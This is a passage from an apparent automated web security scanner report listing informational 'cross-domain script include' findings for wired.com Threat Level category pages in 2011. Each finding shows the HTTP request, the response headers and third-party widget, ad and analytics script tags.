Content-Length: 122702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.117. http://www.wired.com/threatlevel/category/privacy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/privacy/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/privacy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=199
Expires: Wed, 12 Jan 2011 15:34:36 GMT
Date: Wed, 12 Jan 2011 15:31:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 121773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.118. http://www.wired.com/threatlevel/category/rfid/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/rfid/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/rfid/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:15:39 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=103
Expires: Wed, 12 Jan 2011 15:32:59 GMT
Date: Wed, 12 Jan 2011 15:31:16 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106431

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.119. http://www.wired.com/threatlevel/category/riaa-litigation/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/riaa-litigation/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/riaa-litigation/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:16:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=126
Expires: Wed, 12 Jan 2011 15:33:26 GMT
Date: Wed, 12 Jan 2011 15:31:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.120. http://www.wired.com/threatlevel/category/rsa-conference/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/rsa-conference/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/rsa-conference/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:16:56 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=138
Expires: Wed, 12 Jan 2011 15:33:38 GMT
Date: Wed, 12 Jan 2011 15:31:20 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 78553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.121. http://www.wired.com/threatlevel/category/sexting/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/sexting/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/sexting/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:17:06 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=121
Expires: Wed, 12 Jan 2011 15:33:30 GMT
Date: Wed, 12 Jan 2011 15:31:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 77580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.122. http://www.wired.com/threatlevel/category/spooks-gone-wild/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/spooks-gone-wild/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/spooks-gone-wild/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:17:40 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=99
Expires: Wed, 12 Jan 2011 15:33:10 GMT
Date: Wed, 12 Jan 2011 15:31:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 138433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.123. http://www.wired.com/threatlevel/category/stuxnet/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/stuxnet/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/stuxnet/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:18:41 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=166
Expires: Wed, 12 Jan 2011 15:34:24 GMT
Date: Wed, 12 Jan 2011 15:31:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70092

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.124. http://www.wired.com/threatlevel/category/sunshine-and-secrecy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/sunshine-and-secrecy/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/sunshine-and-secrecy/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:18:53 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=93
Expires: Wed, 12 Jan 2011 15:33:18 GMT
Date: Wed, 12 Jan 2011 15:31:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.125. http://www.wired.com/threatlevel/category/surveillance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/surveillance/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/surveillance/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:19:05 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=123
Expires: Wed, 12 Jan 2011 15:33:51 GMT
Date: Wed, 12 Jan 2011 15:31:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.126. http://www.wired.com/threatlevel/category/the-courts/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/the-courts/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/the-courts/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:19:52 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=113
Expires: Wed, 12 Jan 2011 15:33:42 GMT
Date: Wed, 12 Jan 2011 15:31:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.127. http://www.wired.com/threatlevel/category/the-ridiculous/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/the-ridiculous/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/the-ridiculous/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:02 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=142
Expires: Wed, 12 Jan 2011 15:34:14 GMT
Date: Wed, 12 Jan 2011 15:31:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 116182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.128. http://www.wired.com/threatlevel/category/threats/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/threats/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/threats/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:12 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=145
Expires: Wed, 12 Jan 2011 15:34:26 GMT
Date: Wed, 12 Jan 2011 15:32:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117270

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.129. http://www.wired.com/threatlevel/category/three-strikes/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/three-strikes/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/three-strikes/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:20 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=87
Expires: Wed, 12 Jan 2011 15:33:30 GMT
Date: Wed, 12 Jan 2011 15:32:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<!-- NextGeEN Gallery CoolIris/PicLens support -->
<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...
<!-- END wiredGlobalfooter -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.130. http://www.wired.com/threatlevel/category/tsa/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wired.com
Path:   /threatlevel/category/tsa/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /threatlevel/category/tsa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
